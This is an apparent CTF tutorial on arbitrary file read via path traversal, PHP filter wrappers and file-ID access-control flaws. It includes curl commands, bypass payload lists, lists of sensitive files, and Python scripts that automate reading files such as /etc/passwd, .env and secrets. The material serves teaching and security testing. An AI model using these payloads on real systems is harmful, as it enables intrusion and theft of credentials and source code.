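Find every file-related parameter and download endpoint, and record the normal filename, response headers, and response length as a baseline.
Request a nonexistent file to trigger an error and try to leak the real path or working directory.
Verify read capability with low-risk targets: /etc/passwd on Linux, C:\Windows\win.ini on Windows, and .env or config files inside the application.
Depending on the filtering in place, test ../, URL encoding, double encoding, backslashes, suffix truncation, and PHP filters.
Read the application configuration and source code to locate database settings, the JWT secret, template paths, the flag path, and routes.
If the endpoint downloads by ID, switch accounts and IDs to check for broken access control on file downloads.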

Minimal verification example

A normal request to the download endpoint:

curl -i "http://target/download?file=report.pdf"

Verify path traversal:

curl -i "http://target/download?file=../../../../etc/passwd"
curl -i "http://target/download?file=..%2f..%2f..%2f..%2fetc%2fpasswd"

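If the target is PHP, prefer Base64 when reading source code, so the file comes back as text instead of being executed when the sink is an include: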

curl "http://target/view?page=php://filter/convert.base64-encode/resource=index.php"

Decode the Base64 output, then search it for flag, SECRET_KEY, DB_, routes, include, open(, and readFile.
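The decode-and-search step can be sketched as a small helper. This is only an illustration: the function name decode_and_grep and the sample input are made up here, and the keyword list simply repeats the one in the text. It assumes the response body is clean Base64 with no surrounding HTML.

```python
import base64
import binascii

# Keywords repeated from the text above.
KEYWORDS = ["flag", "SECRET_KEY", "DB_", "routes", "include", "open(", "readFile"]

def decode_and_grep(b64_body, keywords=KEYWORDS):
    """Decode a Base64 body and return (line_number, line) pairs that contain a keyword."""
    try:
        raw = base64.b64decode(b64_body.strip(), validate=True)
    except (binascii.Error, ValueError):
        return []  # not clean Base64, e.g. wrapped in an HTML template
    source = raw.decode("utf-8", errors="replace")
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        if any(keyword in line for keyword in keywords):
            hits.append((number, line.strip()))
    return hits

if __name__ == "__main__":
    # Hypothetical sample standing in for a php://filter response body.
    sample = base64.b64encode(b"<?php\n$DB_PASS = 'x';\ninclude 'flag.php';\n").decode()
    for number, line in decode_and_grep(sample):
        print(number, line)
```

If the Base64 is embedded in a page template, cut out the encoded span first; strict validation rejects the whole body otherwise.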

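Common exploitation / solving routes

Route overview:

Path traversal route: escape the download directory with ../, encoding, backslashes, or doubled sequences.
File ID access-control route: enumerate id values or substitute another user's file ID to download files you are not authorized for.
Source code route: read index.php, app.py, settings.py, application.yml, WEB-INF/web.xml.
Config and secrets route: read .env, database config, the JWT secret, or the Flask/Django secret key, then chain into token forgery or login.
Log route: read access logs, error logs, and the process environment to find tokens, paths, traces of injection, or log-poisoning opportunities.
Wrapper route: use php://filter on PHP, look at the classpath on Java, and look at /proc/self/environ and /proc/self/cmdline on Linux.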

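Relationship to path traversal

Path traversal is one common cause of arbitrary file read.

But arbitrary file read does not come only from path traversal.

It can also come from:

Incorrect file ID mapping.
URL proxying.
File inclusion through stream filters.
Leaked backup files.
Debug endpoints.
Missing authorization on read endpoints.

So "arbitrary file read" is the outcome, and "path traversal" is one of its causes.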

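Arbitrary file read typically shows up in file download endpoints (/download?file=report.pdf), image preview endpoints (/view?src=avatar.png), file export features (/export?path=...), file path parameters used in template rendering, and anywhere a filename is concatenated directly into a filesystem path. If the backend concatenates user input into a file path, for example open(base_dir + user_input), without filtering or validating traversal sequences such as ../, the result is arbitrary file read.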
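A minimal sketch of why plain concatenation is exploitable, next to one possible boundary check. BASE_DIR and both function names are hypothetical, and a POSIX filesystem is assumed; this is not taken from any particular application.

```python
import os
import posixpath

BASE_DIR = "/var/www/app/files"  # hypothetical download directory

def naive_path(user_input):
    """Vulnerable pattern: the path the OS ends up opening after plain concatenation."""
    return posixpath.normpath(BASE_DIR + "/" + user_input)

def is_inside_base(user_input):
    """Boundary check: resolve the joined path, then require it to stay under BASE_DIR."""
    base = os.path.realpath(BASE_DIR)
    resolved = os.path.realpath(os.path.join(base, user_input))
    return os.path.commonpath([base, resolved]) == base

if __name__ == "__main__":
    for candidate in ["report.pdf", "../../../../etc/passwd", "/etc/passwd"]:
        print(candidate, "->", naive_path(candidate), "inside base:", is_inside_base(candidate))
```

When testing a target, the useful question is which of these two behaviours the backend has: a check that resolves the path first leaves little room for encoding tricks, while a string filter on ../ usually does.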

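In CTFs the entry point is often not exposed directly; it may be hidden in API parameters, POST bodies, HTTP headers (such as X-File-Path), or even nested JSON fields. Go through the requests one by one in Burp Suite and find every parameter that carries a file path or filename.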
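For JSON bodies, the search for path-carrying fields can be roughly automated. The sketch below walks a decoded JSON document and lists fields whose key or value looks like a file reference. The two regular expressions are assumed heuristics chosen for illustration, and strings stored directly inside arrays are not inspected.

```python
import json
import re

# Hypothetical heuristics: key names and value shapes that hint at a file path.
KEY_HINT = re.compile(r"(file|path|name|src|doc|template|download)", re.IGNORECASE)
VALUE_HINT = re.compile(r"(/|\\|\.[A-Za-z0-9]{2,5}$)")

def find_path_like_fields(node, prefix=""):
    """Return dotted paths of string fields that look like file references."""
    found = []
    if isinstance(node, dict):
        for key, value in node.items():
            dotted = f"{prefix}.{key}" if prefix else key
            if isinstance(value, str):
                if KEY_HINT.search(key) or VALUE_HINT.search(value):
                    found.append(dotted)
            else:
                found += find_path_like_fields(value, dotted)
    elif isinstance(node, list):
        for index, value in enumerate(node):
            found += find_path_like_fields(value, f"{prefix}[{index}]")
    return found

if __name__ == "__main__":
    body = json.loads('{"user": {"avatar": {"src": "avatar.png"}}, "note": "hi"}')
    print(find_path_like_fields(body))
```

Each reported field is only a candidate; it still has to be tested by hand with the same baseline comparison as any query parameter.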

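Exploitation

Once you have arbitrary file read, the usual order is: first read a system file to confirm the vulnerability (/etc/passwd is the classic target); then read application config files for database passwords, keys, and other secrets (.env, config.php, application.yml); then read the application source to understand the business logic (routes, filter rules, flag location); and finally read log files or the process information under /proc/self/ to support follow-up attacks (for example, pulling a secret key out of the environment variables to forge a JWT).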
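The content of /proc/self/environ is a run of NUL-separated KEY=VALUE entries, so it is hard to read raw. A small sketch for splitting it and picking out likely secrets follows; the function names and the hint list are illustrative assumptions.

```python
def parse_environ(raw):
    """Split the NUL-separated bytes of /proc/self/environ into a dict."""
    env = {}
    for entry in raw.split(b"\x00"):
        if b"=" not in entry:
            continue  # empty trailing entry or malformed data
        key, _, value = entry.partition(b"=")
        env[key.decode("utf-8", "replace")] = value.decode("utf-8", "replace")
    return env

def pick_secrets(env, hints=("SECRET", "KEY", "TOKEN", "PASS", "FLAG", "DB_")):
    """Keep only the variables whose name contains one of the hint substrings."""
    return {k: v for k, v in env.items() if any(h in k.upper() for h in hints)}

if __name__ == "__main__":
    # Hypothetical bytes standing in for a downloaded /proc/self/environ.
    raw = b"PATH=/usr/bin\x00SECRET_KEY=abc=123\x00FLAG_PATH=/flag_7ad9\x00"
    print(pick_secrets(parse_environ(raw)))
```

Work on the raw response bytes (resp.content in requests) rather than decoded text, since the NUL separators may be altered or dropped by text handling.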

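In Java applications, WEB-INF/web.xml and the WEB-INF/classes/ directory are the key targets: they give you the application configuration and the compiled bytecode. In Python applications, settings.py, wsgi.py, and .env usually hold the critical configuration. Do not stop after reading one file; enumerate targets systematically.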

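Common sensitive files

Common on Linux:

/etc/passwd
/proc/self/environ
/proc/self/cmdline
Application config files
.env
Source files
Log files
SSH keys

Common on Windows:

win.ini
hosts
Application config
Files in user directories
IIS configuration

Choose targets according to the technology stack; /etc/passwd is not always the right file to read.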
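One way to keep target selection tied to the stack is a small lookup table. The sketch below only reuses file names that appear in this document; the stack labels and the targets_for helper are hypothetical.

```python
# Read targets per stack, collected from the lists in this document.
TARGETS_BY_STACK = {
    "linux": ["/etc/passwd", "/proc/self/environ", "/proc/self/cmdline"],
    "windows": ["C:\\Windows\\win.ini", "C:\\Windows\\System32\\drivers\\etc\\hosts"],
    "php": ["index.php", "config.php", ".env"],
    "python": ["app.py", "settings.py", "wsgi.py", ".env"],
    "java": ["WEB-INF/web.xml", "application.yml"],
}

def targets_for(*stacks):
    """Return the de-duplicated read targets for the detected stacks, in order."""
    ordered = []
    for stack in stacks:
        for path in TARGETS_BY_STACK.get(stack.lower(), []):
            if path not in ordered:
                ordered.append(path)
    return ordered

if __name__ == "__main__":
    print(targets_for("linux", "python"))
```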

Download endpoint risks

Common forms of download endpoints:

/download?file=report.pdf
/file?id=123
/export?path=...

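If the backend returns a file based only on a user-supplied path or ID, without checking permissions and the directory boundary, it can leak sensitive files.

Echoed filenames, paths in error messages, and download headers can all provide clues.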
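Paths leaked in error messages can be pulled out with a rough pattern match. The two regular expressions below are assumed heuristics, and they will also match path-like fragments of URLs, so treat the output as candidates only.

```python
import re

# Heuristic patterns: an absolute POSIX path and a drive-letter Windows path.
UNIX_PATH = re.compile(r"(?<![\w.])/(?:[\w.\-]+/)+[\w.\-]+")
WINDOWS_PATH = re.compile(r"[A-Za-z]:\\(?:[\w.\- ]+\\)*[\w.\-]+")

def extract_paths(text):
    """Return the unique filesystem-looking paths found in an error message."""
    found = UNIX_PATH.findall(text) + WINDOWS_PATH.findall(text)
    return list(dict.fromkeys(found))  # de-duplicate while keeping order

if __name__ == "__main__":
    # Hypothetical error text of the kind a missing file can trigger.
    error = "No such file or directory: '/var/www/app/files/notfound'"
    print(extract_paths(error))
```

The directory part of a leaked path tells you where the download directory sits, which in turn gives the number of ../ segments needed to reach the filesystem root.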

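Why reading source code matters

In CTFs, reading source code is often more important than reading system files.

Source code can expose:

Routes.
Database configuration.
Keys.
The JWT secret.
Filter logic.
The flag path.
Classes usable for deserialization.

Do not stop once a system file is readable; keep going and look for application files.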

Filter bypass techniques

# Common filter bypasses

# 1. Path traversal bypasses
path_bypasses = [
    "../../../../etc/passwd",
    "....//....//....//etc/passwd",     # doubled sequence (survives one pass of "../" stripping)
    "..%2f..%2f..%2fetc/passwd",        # URL encoding
    "..%252f..%252f..%252fetc/passwd",  # double encoding
    "%2e%2e/%2e%2e/etc/passwd",         # encoded dots
    "..%c0%af..%c0%afetc/passwd",       # overlong UTF-8 encoding of "/"
    "..%ef%bc%8f..%ef%bc%8fetc/passwd", # fullwidth slash
    "..\\..\\..\\etc\\passwd",          # backslashes (Windows)
    "..//..//..//etc/passwd",           # redundant slashes
]

# 2. Keyword filter bypasses
keyword_bypasses = [
    "/etc/passwd%00",                    # null byte truncation
    "/etc/passwd%00.jpg",                # null byte + suffix
    "/etc/passwd%0a",                    # newline
    "/etc/passwd%20",                    # space
    "/etc/passwd#",                      # hash
    "/etc/passwd?",                      # question mark
    "/etc/./passwd",                     # current-directory segment
    "/etc/passwd/.",                     # trailing dot segment
    "/etc/passwd/..",                    # trailing parent-directory segment
]

# 3. Appended-suffix bypasses
suffix_bypasses = [
    "/etc/passwd%00.html",               # null byte (PHP < 5.3.4)
    # PHP filter wrappers
    "php://filter/read=convert.base64-encode/resource=/etc/passwd",
    "php://filter/convert.base64-encode/resource=config.php",
]
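Two of the payload families above work only against specific filter mistakes. The sketch below models those mistakes with two hypothetical weak filters (strip_once and decode_then_check are invented for illustration, not taken from any real application) so the effect of each payload can be checked offline.

```python
from urllib.parse import unquote

def strip_once(value):
    """Hypothetical weak filter: remove every '../' in a single pass."""
    return value.replace("../", "")

def decode_then_check(value):
    """Hypothetical weak filter: reject '../' after one URL-decode.

    Returns None when blocked; otherwise returns what a second decode
    later in the application would produce.
    """
    once = unquote(value)
    if "../" in once:
        return None
    return unquote(once)

if __name__ == "__main__":
    # The doubled sequence collapses back into a working traversal.
    print(strip_once("....//....//....//etc/passwd"))
    # Single encoding is caught; double encoding slips through.
    print(decode_then_check("..%2f..%2fetc/passwd"))
    print(decode_then_check("..%252f..%252fetc%252fpasswd"))
```

A filter that strips in a loop until nothing changes, or that decodes exactly once and never again, defeats both payloads, which is why the choice of bypass should follow from observed filter behaviour.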

Null byte injection

import requests

def test_null_byte_injection(url, param, file_path):
    """Test null byte injection (only effective on old runtimes such as PHP < 5.3.4)."""
    # Use a raw NUL character: requests percent-encodes parameter values,
    # so "\x00" is sent as %00, while a literal "%00" would be sent as %2500.
    payloads = [
        f"{file_path}\x00",
        f"{file_path}\x00.jpg",
        f"{file_path}\x00.png",
        f"{file_path}\x00.html",
    ]

    for payload in payloads:
        try:
            resp = requests.get(url, params={param: payload}, timeout=5)
        except requests.RequestException:
            continue  # network error: try the next payload
        if resp.status_code == 200 and resp.text:
            # Check whether the response contains the target file's content
            if "root:" in resp.text or "flag" in resp.text.lower():
                print(f"[!] Success: {payload!r}")
                print(f"    Response length: {len(resp.text)}")
                return True

    return False

# Usage example
# test_null_byte_injection("http://target.com/download", "file", "/etc/passwd")
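A scripting pitfall worth checking before trusting any encoded payload: values passed as query parameters are percent-encoded by the client, so a payload that is already encoded gets encoded a second time. The sketch below uses the standard library's urlencode to show the effect without any network traffic; encoded_query and raw_query are hypothetical helper names.

```python
from urllib.parse import urlencode

def encoded_query(param, value):
    """Query string as a client would build it from a parameter mapping."""
    return urlencode({param: value})

def raw_query(param, value):
    """Query string with the value passed through untouched (already encoded by hand)."""
    return f"{param}={value}"

if __name__ == "__main__":
    print(encoded_query("file", "/etc/passwd%00"))    # the % itself gets encoded
    print(encoded_query("file", "/etc/passwd\x00"))   # the raw NUL becomes %00
    print(raw_query("file", "..%252f..%252fetc%252fpasswd"))
```

For payloads that depend on an exact encoding, appending the hand-encoded query string to the URL is the usual workaround; confirm what actually goes over the wire in a proxy such as Burp Suite.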

PHP stream wrappers in detail

import base64
import binascii
import requests

def php_stream_read(url, param, target_file):
    """Read a file through PHP stream wrappers."""
    wrappers = [
        f"php://filter/read=convert.base64-encode/resource={target_file}",
        f"php://filter/convert.base64-encode/resource={target_file}",
        f"php://filter/string.rot13/resource={target_file}",
        f"php://filter/string.toupper/resource={target_file}",
        f"compress.zlib://{target_file}",
        f"compress.bzip2://{target_file}",
    ]

    for wrapper in wrappers:
        try:
            resp = requests.get(url, params={param: wrapper}, timeout=5)
        except requests.RequestException:
            continue  # network error: try the next wrapper
        body = resp.text.strip()
        if resp.status_code != 200 or not body:
            continue
        try:
            # validate=True rejects non-Base64 bodies instead of silently decoding garbage
            decoded = base64.b64decode(body, validate=True).decode("utf-8", errors="ignore")
        except (binascii.Error, ValueError):
            decoded = ""
        if decoded:
            print(f"[!] {wrapper}")
            print(f"    Content: {decoded[:200]}")
            return decoded
        if len(body) > 10:
            # Not Base64 (rot13, toupper, compress.*): show the raw response
            print(f"[*] {wrapper}")
            print(f"    Raw response: {body[:200]}")

    return None

def php_stream_write(url, param, content):
    """Build a data:// payload that supplies attacker-controlled content inline.

    This does not write a file. It only helps when the sink is include/require
    and allow_url_include is enabled. url and param are unused here.
    """
    payload = f"data://text/plain;base64,{base64.b64encode(content.encode()).decode()}"
    return payload

# Usage examples
# php_stream_read("http://target.com/view", "page", "config.php")
# php_stream_read("http://target.com/view", "page", "/etc/passwd")

Abusing download endpoints

import requests

def test_download_endpoint(url, param="file"):
    """Probe a download endpoint for file reads."""
    # Try the given parameter first, then other common download parameter names
    other_params = ["file", "path", "filename", "name", "download", "doc", "document"]
    common_params = [param] + [p for p in other_params if p != param]

    # Sensitive files to request
    sensitive_files = [
        "/etc/passwd",
        "/etc/hosts",
        "/etc/shadow",
        "/proc/self/environ",
        "/proc/self/cmdline",
        "/proc/self/fd/0",
        ".env",
        "config.php",
        "config.yml",
        "database.yml",
        "wp-config.php",
        ".htpasswd",
        ".git/config",
        "WEB-INF/web.xml",
        "application.properties",
    ]

    for param_name in common_params:
        for file_path in sensitive_files:
            try:
                resp = requests.get(url, params={param_name: file_path}, timeout=3)
            except requests.RequestException:
                continue  # network error: try the next combination
            if resp.status_code == 200 and len(resp.text) > 10:
                # Look for strings that suggest sensitive content (heuristic, expect false positives)
                indicators = ["root:", "password", "secret", "key", "database", "DB_"]
                if any(ind in resp.text for ind in indicators):
                    print(f"[!] {param_name}={file_path}")
                    print(f"    Length: {len(resp.text)}")

# IDOR on file downloads
def test_file_idor(url, file_ids):
    """Test for broken access control on file IDs."""
    for fid in file_ids:
        try:
            resp = requests.get(url, params={"id": fid}, timeout=3)
        except requests.RequestException:
            continue  # network error: try the next ID
        if resp.status_code == 200:
            content_type = resp.headers.get("Content-Type", "")
            content_disp = resp.headers.get("Content-Disposition", "")
            print(f"ID {fid}: {resp.status_code} | {content_type} | {content_disp}")

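Common sensitive file paths

Linux system files:
  /etc/passwd              User accounts
  /etc/shadow              Password hashes (requires root)
  /etc/hosts               Hostname mappings
  /etc/resolv.conf         DNS configuration
  /etc/crontab             Scheduled tasks
  /proc/self/environ       Environment variables
  /proc/self/cmdline       Startup command line
  /proc/self/status        Process status
  /proc/version            Kernel version
  /proc/net/tcp            TCP connections

Application config files:
  .env                     Environment variables (often contains passwords)
  config.php               PHP configuration
  config.yml / config.yaml YAML configuration
  database.yml             Database configuration
  application.properties   Java configuration
  settings.py              Django configuration
  wp-config.php            WordPress configuration
  .htpasswd                HTTP authentication passwords
  .htaccess                Apache configuration

Version control:
  .git/config              Git configuration
  .git/HEAD                Git HEAD
  .svn/entries             SVN metadata

Java applications:
  WEB-INF/web.xml          Web configuration
  WEB-INF/classes/         Class files
  META-INF/MANIFEST.MF     Manifest file

Windows:
  C:\Windows\win.ini
  C:\Windows\System32\drivers\etc\hosts
  C:\inetpub\logs\LogFiles\  IIS logs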

File read automation script

import base64
import binascii
import sys

import requests

def auto_file_read(base_url, param, file_path):
    """Try several ways to read a file and return the first response that looks usable."""
    attempts = [
        file_path,                                   # direct path
        "../../../../" + file_path.lstrip("/"),      # path traversal (depth is a guess; adjust to the target)
        f"php://filter/read=convert.base64-encode/resource={file_path}",  # PHP filter
        # data:// is left out: it echoes its own payload and never reads a file
    ]

    for attempt in attempts:
        try:
            resp = requests.get(base_url, params={param: attempt}, timeout=5)
        except requests.RequestException:
            continue  # network error: try the next attempt
        if resp.status_code == 200 and len(resp.text) > 5:
            content = resp.text
            # Decode only if the whole body is valid Base64
            try:
                content = base64.b64decode(content.strip(), validate=True).decode("utf-8", errors="ignore")
            except (binascii.Error, ValueError):
                pass  # not Base64: keep the raw body

            # A 200 response is not proof of a read; compare it against a baseline
            print(f"[+] Got a response: {attempt}")
            print(f"    Content (first 500 chars): {content[:500]}")
            return content

    return None

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python3 file_read.py <url> <param> <file>")
        sys.exit(1)

    auto_file_read(sys.argv[1], sys.argv[2], sys.argv[3])

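Common reasons for failure

Treating /etc/passwd as the final goal: it is only the proof point; the real value is usually in source code, configuration, environment variables, and the flag path.
Ignoring the application's working directory: first work out the application root from error messages, /proc/self/cmdline, and config files.
Trying only path traversal: file ID access-control flaws, backup files, debug endpoints, and URL proxies can also lead to arbitrary read.
Stopping when one encoding bypass fails: keep testing double encoding, backslashes, current-directory segments, appended suffixes, case changes, and different parameter positions.
PHP source comes back garbled or blank: switch to php://filter/convert.base64-encode/resource=...
Not testing Windows paths: on Windows challenges, test backslashes, drive letters, win.ini, IIS logs, and application config.
Looking only at the status code: download endpoints often return error pages with a 200, so compare response length, Content-Type, file signature, and keywords.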
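The last point can be made concrete with a helper that collects the signals worth comparing besides the status code. This is a sketch: describe_response, the signature table, and the field names are all assumptions made for illustration, and the body is expected as raw bytes.

```python
# A few well-known file signatures (magic bytes).
MAGIC = {
    b"%PDF": "pdf",
    b"\x89PNG": "png",
    b"PK\x03\x04": "zip",
    b"\xff\xd8\xff": "jpeg",
}

def describe_response(status, content_type, body, baseline_len):
    """Summarise a response relative to the baseline of a normal download."""
    kind = next((name for magic, name in MAGIC.items() if body.startswith(magic)), "unknown")
    head = body.lstrip()[:15].lower()
    return {
        "status": status,
        "content_type": content_type.split(";")[0].strip().lower(),
        "length_delta": len(body) - baseline_len,
        "file_kind": kind,
        "looks_like_passwd": b"root:x:0:0" in body,
        "looks_like_html_error": head.startswith((b"<!doctype", b"<html")),
    }

if __name__ == "__main__":
    # Hypothetical 200 response that is really an error page.
    page = b"<html><body>File not found</body></html>"
    print(describe_response(200, "text/html; charset=utf-8", page, baseline_len=1000))
```

With requests, the arguments would come from resp.status_code, resp.headers.get("Content-Type", ""), and resp.content, with baseline_len taken from the normal download recorded at the start.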

Mini case

The challenge exposes /download?file=manual.pdf. First request a nonexistent file:

curl -i "http://target/download?file=notfound"

The error leaks /var/www/app/files/notfound, which shows that the backend concatenates the parameter into a file path. Try reading a system file:

curl "http://target/download?file=../../../../etc/passwd"

The response contains root:x:0:0, which confirms arbitrary read. Read the source next instead of stopping:

curl "http://target/download?file=../app.py"
curl "http://target/download?file=../.env"

The source reveals FLAG_PATH=/flag_7ad9, so the final read is:

curl "http://target/download?file=../../../../flag_7ad9"

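The full chain in this case: error message locates the root directory -> system file confirms the read -> source/config read -> flag path located -> target file read.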
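The traversal strings in this case follow directly from the leaked path. A minimal sketch of that calculation, assuming the leaked path is the full path of the requested file on a POSIX system; traversal_payload is a hypothetical helper name.

```python
import posixpath

def traversal_payload(leaked_file_path, target):
    """Relative path from the directory of a leaked file path to an absolute target."""
    base_dir = posixpath.dirname(leaked_file_path)
    return posixpath.relpath(target, start=base_dir)

if __name__ == "__main__":
    leaked = "/var/www/app/files/notfound"
    for target in ["/etc/passwd", "/var/www/app/app.py", "/flag_7ad9"]:
        print(traversal_payload(leaked, target))
```

The computed values match the requests used in the case, which is a quick check that the leaked directory was read correctly.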